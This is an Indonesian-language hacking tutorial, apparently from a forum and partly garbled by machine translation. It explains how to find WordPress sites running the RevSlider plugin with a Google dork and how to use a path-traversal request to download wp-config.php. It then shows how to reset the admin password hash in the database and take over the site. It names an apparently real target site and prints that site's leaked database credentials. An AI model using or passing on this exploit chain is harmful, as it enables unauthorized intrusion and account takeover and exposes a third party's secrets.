Gk Bosan" Bahas Web Exploit :v
Langsung Ajah
Dork - inurl: wp-content / plugins / revslider
dork ini mengambil semua situs pada platform wordpress dengan nama / wp-content / plugins / revslider
google dork ...
kami menemukan target kami, kami akan menguji satu, klik pada pertama, ternyata
INDEKS / http://www.casaconceitoabc.com.br/si...lugin/videojs/
Sekarang kita akan menggunakan PoC untuk web (Exploit) mengubah awal direktori, sebenarnya Anda akan mengubahnya dari / site karena / wp-content / dimulai di dir lain (Dir berarti direktori)
PoC - wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
akan tetap seperti itu.
http://www.casaconceitoabc.com.br/site/ ... config.php
Ini akan men-download satu mysql akses file server atau postgresql
Anda memeriksa file banyak server yang kemudian localhost tidak perlu bagi Anda mengubah nama konektor daun Server localhost bahkan jika benar dan menempatkan mysql.site.com.br (hanya contoh jika yang lain tidak berhasil.
akan menjadi kurang begitu setelah u membuka file yang didownload
// * * pengaturan MySQL - Anda bisa mendapatkan info ini dari web host Anda ** //
/ ** nama database untuk WordPress * /
define ( 'DB_NAME', 'casaconc_ws788');
- [color = # 40FF00] / ** MySQL database username * /
define ('DB_USER', 'casaconc_ws788');
/ ** Kata sandi basis data MySQL * /
define ('DB_PASSWORD', 'bonS98Pnr1');
/ ** Nama host MySQL * /
define ('DB_HOST', 'localhost');
/ ** Database Charset untuk digunakan dalam membuat tabel basis data. * /
define ('DB_CHARSET', 'utf8');
/ ** Jenis Database Collate. Jangan ubah ini jika ragu. * /
define ('DB_COLLATE', '');
Untuk menghubungkan ini dalam database, Anda akan mengunduh Konektor MySQL ini jika Anda memiliki localhost yang dapat Anda gunakan sendiri, tetapi saya lebih suka memuatnya di shell atau pada beberapa host, itu ada bersama Anda.
Unduh Connector MySQL: https: //www.sendspace.
setelah menghubungkan konektor Anda akan mengubah password Anda di situs MD5 password, yang akan berada di server MySQL tanpa kompensasi yang Base64 atau WordPress MD5
akan meninggalkan situs di sini untuk Anda membuat kata sandi Anda
Situs UNTUK PASSWORD MD5: http: / /www.miraclesalad.com/webtools/md5.php
Mari kita berasumsi bahwa password kita adalah: 123carro123 dihasilkan md5 dengan demikian akan menjadi
password di md5 tampak seperti ini: f05a56649d73768e864b399e51ec77fb
Anda akan menempatkan dihasilkan sandi di tempat ini sudah dienkripsi: f05a56649d73768e864b399e51ec77fb
ai Anda mencari panel masuk setelah disimpan pengaturan ini di MySQL, dan log di dengan nama admin dari tabel yang diedit
Contoh
+ ---- + ---- + --------- ------------ +
| Beranda | Kata sandi
+ ---- + --------- + ---------------- +
| admin | f05a56649d73768e864b399e51ec77fb | kata sandi Anda untuk menghubungkan bukan ini yang di balik ini dienkripsi yang 123carro123
| |
| adriano | NULL |
+ ---- + --------- + ---------------- +
Simpan dan pergi ke / wp-admin / site dan masuk dengan kata sandi dibuat dalam tabel database
Pengguna: admin
Kata sandi: ***carro***